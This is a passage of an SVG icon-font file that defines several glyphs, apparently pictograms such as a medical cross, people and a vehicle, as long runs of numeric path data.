65.045-61.267 126.167-126.354 126.167zM916.232 307.039h-269.602v-269.326h-269.583v269.326h-269.686v269.518h269.686v269.321h269.583v-269.321h269.602v-269.518zM775.42 385.368c13.429-0.009 23.921 6.219 31.145 15.065l-10.82 15.402c-5.405-7.205-10.287-12.601-19.18-12.601-17.043 0-20.008 23.725-20.008 38.463 0 19.671 4.596 38.496 19.535 38.496 8.052 0 12.475-5.396 17.207-12.629l12.643 14.93c-8.402 9.973-16.758 15.725-29.518 15.725-30.318 0-41.975-28.494-41.975-56.521-0.005-29.645 10.82-56.329 40.969-56.329z" horiz-adv-x="1019" />
<glyph unicode="&#xe667;" d="M337.798 96.693h372.454v370.293h-372.454v-370.293zM638.534 418.041c13.152 0 23.815-10.672 23.815-23.815 0-13.152-10.663-23.815-23.815-23.815-13.143 0-23.815 10.663-23.815 23.815 0 13.143 10.663 23.815 23.815 23.815zM583.83 345.515c0 10.4 8.333 17.521 17.436 17.521-0.094 0 73.841 0 73.841 0 9.939 0 17.464-7.92 17.464-17.521v-90.629h0.019c0-7.516-6.041-12.72-12.683-12.72 0 0-2.94 0-7.713 0v-119.263c0-21.729-31.735-21.729-31.735 0v119.263c-1.616 0-3.213 0-4.829 0v-119.263c0-21.579-31.735-21.579-31.735 0v119.263c-4.528 0-7.365 0-7.384 0-6.548 0-12.701 5.298-12.701 12.72v90.629zM524.523 418.041c13.152 0 23.815-10.672 23.815-23.815 0-13.152-10.663-23.815-23.815-23.815s-23.815 10.663-23.815 23.815c0 13.143 10.663 23.815 23.815 23.815zM469.819 345.515c0 10.4 8.352 17.521 17.436 17.521-0.085 0 73.841 0 73.841 0 9.949 0 17.464-7.92 17.464-17.521v-90.629h0.019c0-7.516-6.031-12.72-12.673-12.72 0 0-2.94 0-7.713 0v-119.263c0-21.729-31.735-21.729-31.735 0v119.263c-1.616 0-3.204 0-4.819 0v-119.263c0-21.579-31.744-21.579-31.744 0v119.263c-4.528 0-7.365 0-7.384 0-6.548 0-12.711 5.298-12.711 12.72v90.629zM410.511 418.041c13.143 0 23.815-10.672 23.815-23.815 0-13.152-10.672-23.815-23.815-23.815-13.152 0-23.815 10.663-23.815 23.815 0 13.143 10.663 23.815 23.815 23.815zM355.807 345.515c0 10.4 8.342 17.521 17.436 17.521-0.094 0 73.841 0 73.841 0 9.949 0 17.474-7.92 17.474-17.521v-90.629h0.019c0-7.516-6.050-12.72-12.683-12.72 0 0-2.94 0-7.713 0v-119.263c0-21.729-31.735-21.729-31.735 0v119.263c-1.616 0-3.213 0-4.829 0v-119.263c0-21.579-31.735-21.579-31.735 0v119.263c-4.538 0-7.375 0-7.393 0-6.539 0-12.701 5.298-12.701 12.72v90.629zM897.437 942.338c-0.009 0-773.458 0.244-773.223 0-71.285 0-111.362-36.855-111.362-112.151v-776.267c0-70.44 36.018-107.313 107.266-107.313h779.546c71.229 0 107.304 35.041 107.304 107.313v776.267c0.009 73.465-36.065 112.151-109.53 112.151zM580.326 728.369l37.897-47.395-1.080 149.466c-0.413 49.246 70.844 49.819 71.267 0l-1.090-149.466 38.33 46.954c26.446 29.048 72.995-11.452 44.267-44.257l-92.968-110.658c-14.674-14.693-33.773-14.608-48.353 0l-92.526 111.081c-28.719 32.824 18.244 73.747 44.257 44.276zM277.391 745.195l92.526 111.099c14.58 14.59 33.679 14.693 48.363 0l92.959-110.658c28.719-32.806-17.812-73.305-44.276-44.257l-38.32 46.954 1.080-149.485c-0.413-49.8-71.671-49.246-71.257 0l1.071 149.485-37.888-47.395c-26.023-29.471-72.986 11.452-44.257 44.257zM713.258 25.313h-377.884c-37.578 0.009-68.702 29.903-68.702 68.317v376.588l0.103 0.019c0 37.559 28.86 68.749 68.608 68.749h377.443c38.442 0 68.58-30.767 68.58-68.768v-376.588l0.009-0.103c0.066-40.049-30.598-68.213-68.157-68.213z" horiz-adv-x="1015" />
<glyph unicode="&#xe668;" d="M485.975 177.108c8.056 3.638 11.591 13.148 7.916 21.2-5.751 12.629-12.957 24.277-21.396 34.554-5.616 6.85-15.725 7.865-22.547 2.221-6.85-5.616-7.837-15.692-2.221-22.547 6.686-8.131 12.414-17.399 17.015-27.508 2.684-5.892 8.519-9.37 14.603-9.375 2.221 0 4.465 0.468 6.63 1.454zM448.961 352.286c9.506-6.055 18.521-12.961 26.848-20.555 0.023-0.028 0.084-0.056 0.108-0.084 3.039-2.96 7.070-4.578 11.18-4.578 2.876 0 5.756 0.767 8.384 2.389 7.533 4.624 9.889 14.495 5.26 22.028-0.079 0.136-8.22 13.644-12.218 29.317-2.165 8.575-10.871 13.737-19.479 11.573-5.555-1.431-9.45-5.733-11.063-10.824-5.429 0.112-10.801-2.24-13.925-7.149-4.741-7.458-2.548-17.375 4.905-22.117zM409.128 371.63c1.753-0.631 3.535-0.93 5.288-0.93 6.63 0 12.821 4.143 15.122 10.745 2.932 8.351-1.459 17.478-9.815 20.41-12.377 4.358-25.231 7.645-38.131 9.754-8.828 1.426-16.959-4.521-18.413-13.233-1.426-8.739 4.493-16.964 13.237-18.39 11.068-1.856 22.084-4.629 32.712-8.356zM431.039 267.299c-11.947 6.499-24.959 11.236-38.631 14.093-8.66 1.81-17.151-3.764-18.96-12.442-1.781-8.664 3.778-17.123 12.438-18.932 10.605-2.221 20.658-5.863 29.864-10.876 2.441-1.314 5.041-1.945 7.645-1.945 5.672 0 11.185 3.039 14.088 8.384 4.218 7.748 1.342 17.473-6.443 21.719zM299.564 376.558c10.189 2.96 21.172 4.821 32.651 5.588 8.823 0.58 15.51 8.22 14.906 17.048-0.58 8.819-7.977 15.528-17.048 14.925-13.752-0.926-26.984-3.175-39.398-6.761-8.496-2.436-13.396-11.315-10.96-19.816 2.029-7.042 8.44-11.61 15.402-11.615 1.487 0 2.969 0.22 4.447 0.631zM316.603 476.405c18.549 0 33.535 15.065 33.535 33.568 0 18.577-14.986 33.591-33.535 33.591-18.577 0-33.614-15.014-33.61-33.591-0.005-18.497 15.033-33.568 33.61-33.568zM469.782 409.439c2.464-1.37 5.157-2.001 7.781-2.001 5.616 0 11.068 2.96 13.999 8.22 4.274 7.678 11.016 14.027 19.507 18.413 7.869 4.054 10.932 13.728 6.878 21.593-4.021 7.865-13.695 10.932-21.555 6.878-14.14-7.262-25.483-18.109-32.829-31.29-4.302-7.752-1.51-17.506 6.219-21.813zM341.315 284.59h-36.63c-8.856 0-16.001-7.145-16.001-16.001 0-8.851 7.145-16.029 16.001-16.029h36.63c8.851 0 16.001 7.177 16.001 16.029 0 8.851-7.149 16.001-16.001 16.001zM542.93 261.141c8.028 3.699 11.563 13.204 7.865 21.237-5.452 11.909-12.026 23.416-19.479 34.213-5.045 7.285-15.014 9.090-22.304 4.049-7.266-5.012-9.094-14.986-4.054-22.276 6.411-9.286 12.026-19.147 16.711-29.369 2.712-5.863 8.519-9.314 14.57-9.314 2.254 0.005 4.526 0.472 6.691 1.459zM510.569 118.118c0 10.109-0.683 20.139-2.109 29.836-1.267 8.767-9.179 14.827-18.137 13.593-8.739-1.267-14.822-9.408-13.56-18.175 1.178-8.192 1.781-16.679 1.781-25.254v-8.959c0-8.856 7.177-16.029 16.033-16.029 8.851 0 16.001 7.173 16.001 16.029h-0.005v8.959zM602.958 457.445c0 8.851-7.149 16.029-16.001 16.029h-36.63c-8.851 0-16.001-7.177-16.001-16.029s7.145-16.001 16.001-16.001h36.63c8.851 0 16.001 7.149 16.001 16.001zM883.478 951.013h-745.149c-72.985 0-132.381-59.406-132.381-132.423v-745.103c0-73.050 59.397-132.447 132.381-132.447h745.149c73.013 0 132.437 59.397 132.437 132.447v745.103c0 73.022-59.425 132.423-132.437 132.423zM729.055 304.373v-255.275h-157.645v11.979c0 8.856-7.149 16.029-16.001 16.029-8.856 0-16.029-7.173-16.029-16.029v-11.979h-28.794v12.003c0 8.856-7.149 16.029-16.001 16.029-8.856 0-16.033-7.173-16.033-16.029v-12.003h-70.413v92.113h-47.043c-63.095 0-114.492 49.236-118.246 111.345h13.775c8.856 0 16.033 7.177 16.033 16.029 0 8.856-7.177 16.001-16.033 16.001h-14.13v58.822c5.943 5.541 12.054 10.712 18.357 14.986 7.308 4.966 9.207 14.935 4.246 22.252-4.989 7.308-14.935 9.225-22.247 4.241-10.581-7.205-20.793-15.87-30.388-25.782-4.054-4.222-5.097-10.006-3.671-15.266h-6.658c-13.401 0-24.249 10.876-24.249 24.221 0 3.376 0.655 6.584 1.917 9.431l62.684 158.15c0 0 6.541 65.564 12.377 90.631 26.199 112.864 151.945 215.302 288.385 215.302 166.136 0 300.687-134.64 300.701-300.724 0.009-95.919-44.948-181.458-114.894-236.474zM585.508 546.739h-5.316v-27.26l5.288-0.028c34.054-0.056 61.842-27.788 61.945-61.814-0.103-34.030-27.891-61.758-61.945-61.809l-5.288-0.056v-27.293h5.316c49.203 0 89.233 40.006 89.233 89.158 0 49.157-40.030 89.102-89.233 89.102zM555.289 177.767c0.168 0 0.304 0 0.472 0.028 8.847 0.248 15.809 7.589 15.556 16.44-0.351 13.097-1.856 26.245-4.465 39.066-1.781 8.688-10.268 14.303-18.904 12.522-8.66-1.781-14.275-10.221-12.494-18.904 2.244-11.012 3.535-22.304 3.834-33.563 0.248-8.683 7.369-15.589 16.001-15.589zM555.396 161.766c-8.856 0-16.029-7.182-16.029-16.033v-36.602c0-8.856 7.173-16.033 16.029-16.033 8.851 0 16.001 7.177 16.001 16.033v36.602c0 8.851-7.149 16.033-16.001 16.033z" horiz-adv-x="1019" />
<glyph unicode="&#xe669;" d="M893.212 938.951h-766.559c-64.436 0-116.66-52.224-116.66-116.651v-766.559c0-64.427 52.224-116.651 116.66-116.651h766.559c64.427 0 116.651 52.224 116.651 116.651v766.559c0 64.427-52.224 116.651-116.651 116.651zM759.305 618.828c6.4 0 11.586-5.186 11.586-11.586s-5.186-11.586-11.586-11.586-11.586 5.186-11.586 11.586 5.186 11.586 11.586 11.586zM741.139 645.49c5.272 0 9.548-4.276 9.548-9.548s-4.276-9.548-9.548-9.548-9.548 4.276-9.548 9.548 4.276 9.548 9.548 9.548zM743.86 594.375c0-6.4-5.186-11.586-11.586-11.586-6.409 0-11.596 5.186-11.596 11.586s5.186 11.586 11.596 11.586c6.4 0 11.586-5.186 11.586-11.586zM714.913 661.115c5.281 0 9.557-4.276 9.557-9.557s-4.276-9.557-9.557-9.557-9.567 4.276-9.567 9.557c0.009 5.281 4.295 9.557 9.567 9.557zM713.785 631.021c5.281 0 9.557-4.286 9.557-9.557s-4.276-9.557-9.557-9.557-9.557 4.276-9.557 9.557 4.286 9.557 9.557 9.557zM687.085 663.704c4.798 0 8.685-3.887 8.685-8.704 0-4.779-3.887-8.666-8.685-8.666s-8.685 3.887-8.685 8.666c0 4.817 3.887 8.704 8.685 8.704zM686.753 638.767c4.807 0 8.695-3.897 8.695-8.695s-3.887-8.695-8.695-8.695c-4.798 0-8.695 3.897-8.695 8.695s3.897 8.695 8.695 8.695zM604.644 797.924c38.381 0 69.49-31.118 69.49-69.49 0-38.381-31.109-69.49-69.49-69.49-38.372 0-69.48 31.109-69.48 69.49 0 38.381 31.118 69.49 69.48 69.49zM624.839 588.079c-4.807 0-8.695 3.897-8.695 8.695s3.887 8.695 8.695 8.695c4.798 0 8.695-3.897 8.695-8.695s-3.897-8.695-8.695-8.695zM633.534 568.311c0-4.798-3.897-8.695-8.695-8.695-4.807 0-8.695 3.897-8.695 8.695s3.887 8.695 8.695 8.695c4.798 0 8.695-3.897 8.695-8.695zM627.892 625.579c0 4.798 3.887 8.685 8.685 8.685s8.685-3.887 8.685-8.685-3.887-8.685-8.685-8.685-8.685 3.887-8.685 8.685zM652.013 585.993c-4.798 0-8.695 3.887-8.695 8.695 0 4.798 3.897 8.695 8.695 8.695 4.807 0 8.695-3.897 8.695-8.695 0-4.807-3.897-8.695-8.695-8.695zM660.708 568.311c0-4.798-3.887-8.695-8.695-8.695-4.798 0-8.695 3.897-8.695 8.695s3.897 8.695 8.695 8.695c4.798 0 8.695-3.897 8.695-8.695zM650.885 646.163c0 4.798 3.887 8.695 8.695 8.695 4.798 0 8.695-3.897 8.695-8.695s-3.897-8.695-8.695-8.695c-4.798 0-8.695 3.897-8.695 8.695zM654.27 619.15c0 4.798 3.887 8.685 8.685 8.685s8.685-3.887 8.685-8.685-3.887-8.685-8.685-8.685-8.685 3.887-8.685 8.685zM590.364 372.11c-9.652 0-18.385 3.944-24.68 10.316l-0.209-0.218-98.759 95.564v80.725l-115.816-75.577-0.929 1.422c-0.256-0.152-0.521-0.294-0.777-0.446l1.707-0.986v-362.761c0.332-2.446 0.54-4.94 0.54-7.481 0-29.364-23.827-53.172-53.182-53.172s-53.172 23.808-53.172 53.172c0 1.925 0.114 3.849 0.303 5.736v426.259l0.237-0.152c0.028 23.429 11.653 44.117 29.421 56.671l-0.057 0.114 2.399 1.479c0.844 0.559 1.716 1.071 2.579 1.593l140.297 86.737c6.248 5.66 13.521 10.202 21.523 13.312l1.783 1.090 0.076-0.389c7.301 2.598 15.151 4.020 23.324 4.020 38.381 0 69.49-31.109 69.49-69.48 0-1.849-0.085-3.688-0.237-5.499v-122.965l76.497-77.739c7.576-6.372 12.411-15.929 12.392-26.596-0.009-19.191-15.569-34.75-34.75-34.75zM825.752 350.331h-105.519l-144.128 146.707c0 0-23.144 45.037 21.902 50.185h227.755v-196.892z" horiz-adv-x="1015" />
<glyph unicode="&#xe66a;" d="M776.211 291.46h100.465v-25.238h-100.465v25.238zM813.897 414.325v-37.155h-37.681v-25.271h37.681v-36.742h25.238v36.742h37.54v25.271h-37.54v37.155zM887.409 951.211h-748.572c-73.352 0-133.021-59.688-133.021-133.050v-748.492c0-73.376 59.674-133.064 133.021-133.064h748.572c73.352 0 133.050 59.688 133.050 133.064v748.492c0 73.366-59.697 133.050-133.050 133.050zM567.085 267.983c-3.002-23.754-24.792-40.645-48.551-37.677l-95.702 12.077c-23.726 3.006-40.645 24.797-37.653 48.551 3.002 23.73 24.797 40.622 48.551 37.63l95.674-12.053c21.936-2.781 38.010-21.523 38.010-43.046 0-1.823-0.085-3.64-0.329-5.482zM644.81 375.099c-1.677-13.293-8.455-25.154-19.052-33.383-10.625-8.201-23.777-11.861-37.094-10.155l-166.611 21.001c-27.498 3.467-47.010 28.663-43.543 56.123 1.677 13.293 8.45 25.158 19.047 33.36 10.63 8.258 23.777 11.861 37.080 10.184l166.635-21.025c27.474-3.467 47.010-28.63 43.539-56.104zM703.577 491.45c-3.495-27.47-28.663-47.038-56.151-43.515l-121.574 15.304c11.753 9.305 20.278 21.964 24.496 36.634 5.341 18.578 3.138 38.146-6.276 55.103-1.513 2.724-3.227 5.369-5.035 7.844l120.996-15.247c27.47-3.471 47.010-28.653 43.543-56.123zM826.5 216.017c-61.6 0-91.629 50.256-91.629 94.983 0 65.757 91.629 211.137 91.629 211.137s91.601-145.38 91.601-211.137c0-44.727-29.978-94.983-91.601-94.983zM881.659 565.76h-202.738c-5.097 1.898-10.47 3.274-16.107 3.964l-165.865 20.945-183.338 52.844c-5.862 1.705-11.945-1.677-13.646-7.516-1.677-5.862 1.625-12.246 7.459-13.956l187.021-53.92c12.908-3.687 23.566-12.222 30.081-23.975 6.496-11.729 8.037-25.266 4.321-38.123-3.687-12.852-12.194-23.533-23.975-30.053-11.644-6.445-25.135-7.985-37.897-4.378-0.085 0.028-0.164 0.028-0.277 0.028l-78.665 22.815c-40.819 12.8-71.206-0.056-103.462-13.65-24.825-10.484-50.481-21.279-85.326-23.646-4.265-0.277-8.751-0.55-14.007-0.521-6.139 0.056-11.118-4.843-11.147-10.898-0.085-6.111 5.035-11.447 11.147-11.447 46.766 0.028 79.327 13.786 108.060 25.924 30.772 12.993 55.075 23.261 88.271 12.828 0.085-0.028 6.938-2.010 16.539-4.763-22.044-10.155-38.503-31.044-41.754-56.776-3.748-29.56 10.954-57.278 35.065-71.563-15.111-10.292-25.952-26.704-28.404-46.212-4.542-35.972 21.048-71.008 57.029-74.503 0 0.005-186.476 0.005-243.806 0.005-57.335 0-61.764 61.759-61.764 61.759v387.18h759.446c0 0 57.231 2.64 57.231-50.040-0.005-55.385-49.495-52.356-49.495-52.356z" />
<glyph unicode="&#xe66b;" d="M890.255 951.808l-748.549-0.005c-73.348 0-133.012-59.697-133.012-133.078v-748.478c0-73.376 59.669-133.045 133.012-133.045h748.549c73.376 0 133.035 59.669 133.035 133.045v748.483c0.005 73.376-59.66 133.078-133.035 133.078zM518.158 66.692c0 0-191.291 123.585-296.89 311.211 16.511 0 35.478 0 41.463 0 7.21-10.785 42.909-64.512 42.909-64.512 3.452-5.148 9.7-7.6 15.731-6.139 6.012 1.428 10.489 6.52 11.189 12.626 0 0 15.839 140.894 25.995 231.058 17.060-71.534 38.071-159.721 38.071-159.721 1.545-6.384 7.065-10.982 13.589-11.283 6.524-0.385 12.466 3.607 14.641 9.77 0 0 11.997 33.994 22.617 63.995 11.311-30.743 24.36-66.165 24.36-66.165 2.104-5.759 7.628-9.634 13.791-9.634 0 0 46.822 0 59.091 0 7.21-10.785 42.909-64.512 42.909-64.512 3.443-5.148 9.69-7.6 15.722-6.139 6.027 1.428 10.512 6.52 11.203 12.626 0 0 15.853 140.922 26.009 231.17 17.093-71.642 38.146-159.829 38.146-159.829 1.484-6.379 7.018-10.982 13.542-11.278 6.52-0.385 12.466 3.607 14.641 9.766 0 0 11.997 33.994 22.566 63.995 11.316-30.743 24.365-66.165 24.365-66.165 2.114-5.754 7.619-9.634 13.81-9.634v-0.005h52.562c-107.285-187.594-302.033-311.202-302.033-311.202zM838.933 413.24l-3.077-5.89c-17.704 0-47.813 0-57.964 0-5.81 15.91-34.905 94.847-34.905 94.847-2.090 5.839-7.703 9.69-13.899 9.662-6.196-0.028-11.701-3.993-13.758-9.827 0 0-9.883-27.906-19.625-55.46-14.81 62.041-46.080 193.188-46.080 193.188-1.649 6.938-8.060 11.701-15.186 11.259-7.187-0.413-12.969-5.975-13.768-13.021 0 0-23.994-213.56-30.908-274.662-12.415 18.667-24.877 37.465-24.877 37.465-2.729 4.077-7.323 6.557-12.274 6.557 0 0-41.993 0-56.71 0-5.82 15.9-34.886 94.842-34.886 94.842-2.118 5.839-7.713 9.69-13.89 9.662-6.2-0.028-11.734-3.993-13.801-9.827 0 0-9.85-27.906-19.592-55.46-14.806 61.985-46.099 193.188-46.099 193.188-1.653 6.938-8.037 11.701-15.167 11.259-7.182-0.413-12.96-5.975-13.791-13.021 0 0-23.994-213.556-30.889-274.657-12.429 18.662-24.886 37.461-24.886 37.461-2.734 4.073-7.323 6.553-12.283 6.553h-65.339l-2.776 5.172c-16.703 37.761-49.316 129.691-49.316 204.171 0 86.232 61.182 183.254 175.217 183.254 168.805 0 189.75-157.461 189.75-157.461s21.711 158.231 190.619 158.231c118.206 0 178.862-100.681 178.862-184.024 0.009-65.32-20.55-155.019-48.701-203.461z" />
<glyph unicode="&#xe66c;" d="M309.271 223.288c-9.16 2.494-9.16 2.245-19.113 4.439v40.335c13.542-1.325 23.388-12.081 23.416-23.923l35.835-0.019c0 27.084-22.566 54.192-59.251 58.913v21.429h-34.323v-21.429c-34.595-4.575-57.048-30.382-57.048-53.375 0-23.214 14.98-41.425 36.606-47.4 8.464-2.325 12.885-3.57 20.771-5.092v-43.013c-15.806 3.255-23.698 16.854-23.698 27.094h-36.582c0-22.772 23.341-57.612 59.946-61.806v-22.941h34.318v22.941c37.93 4.965 60.942 24.708 60.947 53.488-0.005 18.733-7.699 41.073-41.824 50.359zM255.826 234.017c-15.337 2.734-19.583 9.296-19.583 16.37 0 8.262 10.4 16.229 19.583 17.3v-33.67zM290.558 154.323v36.347c15.149-2.17 24.745-8.695 24.745-18.047 0-8.277-8.934-17.709-24.745-18.3zM897.17 951.211h-761.837c-69.655 0-126.375-56.724-126.375-126.431v-761.743c0-69.726 56.719-126.431 126.375-126.431h761.837c69.684 0 126.403 56.705 126.403 126.431v761.743c0 69.702-56.719 126.431-126.403 126.431zM747.976 820.806c33.82 0 61.271-27.446 61.271-61.276 0-33.82-27.451-61.257-61.271-61.257-33.848 0-61.243 27.437-61.243 61.257 0 33.83 27.394 61.276 61.243 61.276zM295.415 818.063c33.327 0 60.303-26.995 60.303-60.303 0-33.303-26.972-60.331-60.303-60.331-33.294 0-60.299 27.028-60.303 60.331 0 33.308 27.009 60.303 60.303 60.303zM169.5 614.729c9.080 30.001 38.762 61.816 77.688 61.816h96.444c38.893 0 68.58-31.814 77.65-61.816l34.017-124.036h-53.023l-28.16 102.264h-23.777l27.474-102.264h-164.798l27.479 102.264h-23.777l-28.174-102.264h-53.027l33.985 124.036zM273.126 67.011c-79.285 0-143.562 64.277-143.562 143.557s64.277 143.553 143.562 143.553c79.285 0 143.557-64.272 143.557-143.553s-64.272-143.557-143.557-143.557zM902.957 386.908l-71.008-0.038v-283.916c0-19.851-16.276-35.943-36.136-35.943-19.808 0-35.915 16.102-35.915 35.943 0 27.117 0 249.288 0 283.892h-22.899c0-34.628 0-256.77 0-283.892 0-19.851-16.121-35.943-35.976-35.943-19.841 0-36.089 16.102-36.089 35.943 0 15.327 0 154.347 0 283.873l-535.378-0.164v68.805h535.388c0 89.586 0 161.008 0 161.008l-114.373-135.417c-24.059-27.794-66.903 6.924-42.764 36.643l118.512 142.388c7.671 7.633 14.538 17.074 42.839 17.074h144.281c30.095 0 54.512-24.383 54.512-54.469l-0.094-167.231h35.098v-68.556z" />
<glyph unicode="&#xe66d;" d="M634.117 332.753c-0.028-27.713-22.561-50.348-50.241-50.432-27.685 0.084-50.237 22.719-50.297 50.432v5.72h-25.474v-5.72c0-41.868 34.006-75.93 75.79-75.93 41.733 0 75.66 34.062 75.66 75.93h0.005v5.72h-25.446v-5.72zM635.695 499.614c7.419 0 12.763 6.191 12.763 12.791v55.147c0 7.419-5.343 12.763-12.763 12.763-6.6 0-12.791-5.343-12.791-12.763v-55.147c0-6.6 6.191-12.791 12.791-12.791zM881.999 949.979h-741.753c-72.685 0-131.812-59.155-131.812-131.84v-741.702c0-72.713 59.127-131.84 131.812-131.84h741.753c72.685 0 131.807 59.127 131.807 131.84v741.702c0.005 72.685-59.122 131.84-131.807 131.84zM117.876 760.73c52.443-47.267 128.014-9.439 142.848-1.201 38.083 21.136 75.25 26.508 110.541 16.007 41.956-12.465 69.25-44.479 81.939-62.701 2.425 0.298 4.855 0.573 7.256 0.573 21.848 0 43.446-12.6 73.337-29.999 8.071-4.72 16.724-9.737 26.126-15.002 6.139-3.379 13.228-14.699 12.055-21.383 0-0.084 0-0.191 0-0.275l-0.219-1.471c-0.68-9.244-6.544-15.327-17.808-18.6l-146.725-41.565c-0.112-0.028-11.185-3.682-20.266-3.682-3.328 0-4.883 0.489-5.399 0.707-9.165 3.928-14.504 10.636-16.091 19.363-0.382 1.992-0.763 3.984-0.703 6.218 0.624 34.281 16.933 65.839 43.385 85.639-10.338 12.819-27.574 29.701-50.804 36.492-22.416 6.572-47.127 2.509-73.444-12.083-17.236-9.57-95.702-48.598-166.018-14.257v57.218zM652.907 113.799c-80.189 0.028-151.696 37.609-197.651 96.056h-175.588c-37.232-51.819-95.376-87.631-162.141-94.72v457.211c66.546-7.033 124.5-42.626 161.787-94.175l39.489-0.028-0.028 39.359c0.028 23.701 8.453 45.359 22.365 62.403 5.944-11.32 15.788-20.345 29.235-26.103 4.827-1.908 10.254-2.835 16.579-2.835 11.837 0 23.892 3.356 28.751 4.883l146.753 41.565c27.085 7.885 35.728 25.94 38.493 38.102l47.611-18.874c0 0 54.761-5.511 75.762-10.366 94.343-21.872 180.033-126.957 180.038-241.068-0.047-138.878-112.575-251.383-251.457-251.411z" horiz-adv-x="1015" />
<glyph unicode="&#xe66e;" d="M723.285 285.455c-20.036 0-36.275-16.206-36.275-36.247s16.239-36.284 36.275-36.284c20.012 0.005 36.233 16.244 36.233 36.284s-16.22 36.247-36.233 36.247zM289.362 286.114c-20.026 0-36.275-16.22-36.275-36.247 0-20.059 16.248-36.28 36.275-36.28s36.261 16.22 36.261 36.28c0 20.026-16.234 36.247-36.261 36.247zM509.372 572.072h-84.538v-84.538h-84.552v-84.552h84.552v-84.524h84.538v84.524h84.538v84.552h-84.538zM882.319 951.457h-745.168c-73.017 0-132.414-59.415-132.414-132.442v-745.075c0-73.045 59.401-132.456 132.414-132.456h745.168c73.017 0 132.428 59.411 132.428 132.456v745.075c0 73.031-59.411 132.442-132.428 132.442zM536.057 676.216h21.223v10.273c0 18.278 15.973 33.058 35.732 33.058 19.727 0 35.686-14.78 35.686-33.058v-10.273h20.765v-16.248h-113.407v16.248zM289.198 174.138c-41.848 0-75.79 33.918-75.79 75.799 0 41.848 33.946 75.832 75.79 75.832 41.876-0.005 75.827-33.984 75.827-75.832-0.005-41.881-33.951-75.799-75.827-75.799zM723.299 173.381c-41.876 0-75.832 33.956-75.832 75.832s33.956 75.813 75.832 75.813c41.844 0 75.753-33.937 75.753-75.813s-33.904-75.832-75.753-75.832zM877.287 249.073h-55.548c0 54.384-44.060 98.636-98.444 98.636-54.394 0-98.496-44.252-98.496-98.636h-237.386c0 54.384-44.083 98.636-98.472 98.636-54.412 0-98.496-44.252-98.496-98.636h-46.029c-16.206 0-28.836 12.274-28.836 28.111v331.659c0 18.067 14.261 32.59 31.744 32.59h595.987c22.65 0 39.211-11.245 47.394-30.944l59.836-145.684c22.645-4.409 36.2-14.191 46.426-70.072l16.169-100.862c5.826-32.829-12.728-44.799-35.849-44.799zM651.881 607.622v-137.772h159.309l-55.88 137.772z" horiz-adv-x="1019" />
<glyph unicode="&#xe66f;" d="M895.613 957.919h-752.045c-73.657 0-133.601-59.944-133.601-133.658v-751.937c0-73.714 59.944-133.686 133.601-133.686h752.045c73.686 0 133.653 59.972 133.653 133.686v751.937c0 73.714-59.968 133.658-133.653 133.658zM628.986 739.623c40.398 0 73.162-32.735 73.162-73.162 0-40.37-32.768-73.133-73.162-73.133-40.398 0-73.133 32.768-73.133 73.133 0 40.422 32.735 73.162 73.133 73.162zM452.221 434.174l37.161 105.972c7.187 19.961 21.070 35.571 60.138 35.571h171.678c39.096 0 52.951-15.61 60.166-35.571l37.161-105.972c2.765-6.852 4.228-22.231-10.905-32.541l-87.422-57.651c-12.746-8.461-29.951-4.922-38.379 7.824-8.433 12.774-4.893 30.003 7.881 38.407l69.401 45.787-19.574 53.918h-27.035l15.865-43.744-52.672-34.755c-11.835-7.8-19.933-19.749-22.778-33.683-2.85-13.902-0.109-28.087 7.687-39.922 3.124-4.7 6.97-8.739 11.255-12.165h-72.94c4.285 3.426 8.131 7.465 11.255 12.165 7.796 11.835 10.537 26.020 7.687 39.922-2.845 13.935-10.943 25.888-22.783 33.683l-52.672 34.755 15.841 43.744h-27.035l-19.555-53.918 69.401-45.787c12.774-8.409 16.285-25.633 7.881-38.407-8.433-12.746-25.633-16.285-38.379-7.824l-87.427 57.651c-15.129 10.311-13.694 25.69-10.901 32.541zM403.503 780.243c4.228-42.527-6.555-86.629-33.594-123.928-22.839-31.489-53.97-53.361-88.196-64.974 1.548 25.109-1.666 50.049-9.263 73.686 5.634 15.577 13.515 30.663 23.717 44.735 27.044 37.303 65.64 61.247 107.336 70.481zM262.399 851.078c24.165-27.204 40.092-61.742 44.325-99.857-9.759-8.985-18.743-18.88-26.652-29.79-6.908-9.537-12.854-19.701-17.993-30.248-5.115 10.504-11.113 20.655-18.054 30.248-7.739 10.66-16.478 20.376-25.968 29.196 4.115 38.322 20.093 73.105 44.343 100.451zM120.591 780.243c41.696-9.235 80.297-33.183 107.336-70.481 27.039-37.27 37.831-81.396 33.622-123.895-41.724 9.207-80.32 33.15-107.364 70.448-27.039 37.303-37.822 81.401-33.594 123.928zM148.046 237.344l-4.063 90.055h14.435l-4.176-89.253c0.694 0.057 1.359 0.222 2.048 0.222l99.097 15.181-4.313 95.86h14.322l-4.341-95.010 82.642 12.67-4.478 95.336h14.68l-4.507-94.458 60.718 9.296-4.063 86.96h14.572l-4.011-85.964 86.96 13.321h208.976c35.283 0 63.648-28.483 63.648-63.545 0-34.892-28.12-63.12-63.153-63.398l-226.597 0.028c-15.063 0.193-27.233 12.444-27.233 27.568 0 15.266 12.354 27.624 27.596 27.624h117.043l95.308 19.904-5.144 24.637-92.764-19.376h-114.443c-29.116 0-52.79-23.67-52.79-52.786 0-10.122 3.015-19.522 7.989-27.568l-285.729 0.028c-20.296 0-36.746 16.483-36.746 36.864 0.009 17.446 12.203 32.041 28.516 35.802zM892.267 76.165c0 0-722.765 0-744.967 0-29.252 0-27.761 28.479-27.761 28.479v20.084c0 8.268 6.72 14.987 15.016 14.987h594.991c47.453 0 67.966 44.376 92.854 44.376h72.657c22.618 0 25.133-19.409 25.133-19.409v-60.727c0.005 0 1.496-27.79-27.922-27.79zM854.691 207.209c-37.081 0-67.188 30.163-67.188 67.211 0 37.161 30.111 67.188 67.188 67.188 37.072 0 67.273-30.026 67.273-67.188 0-37.053-30.191-67.211-67.273-67.211z" horiz-adv-x="1033" />
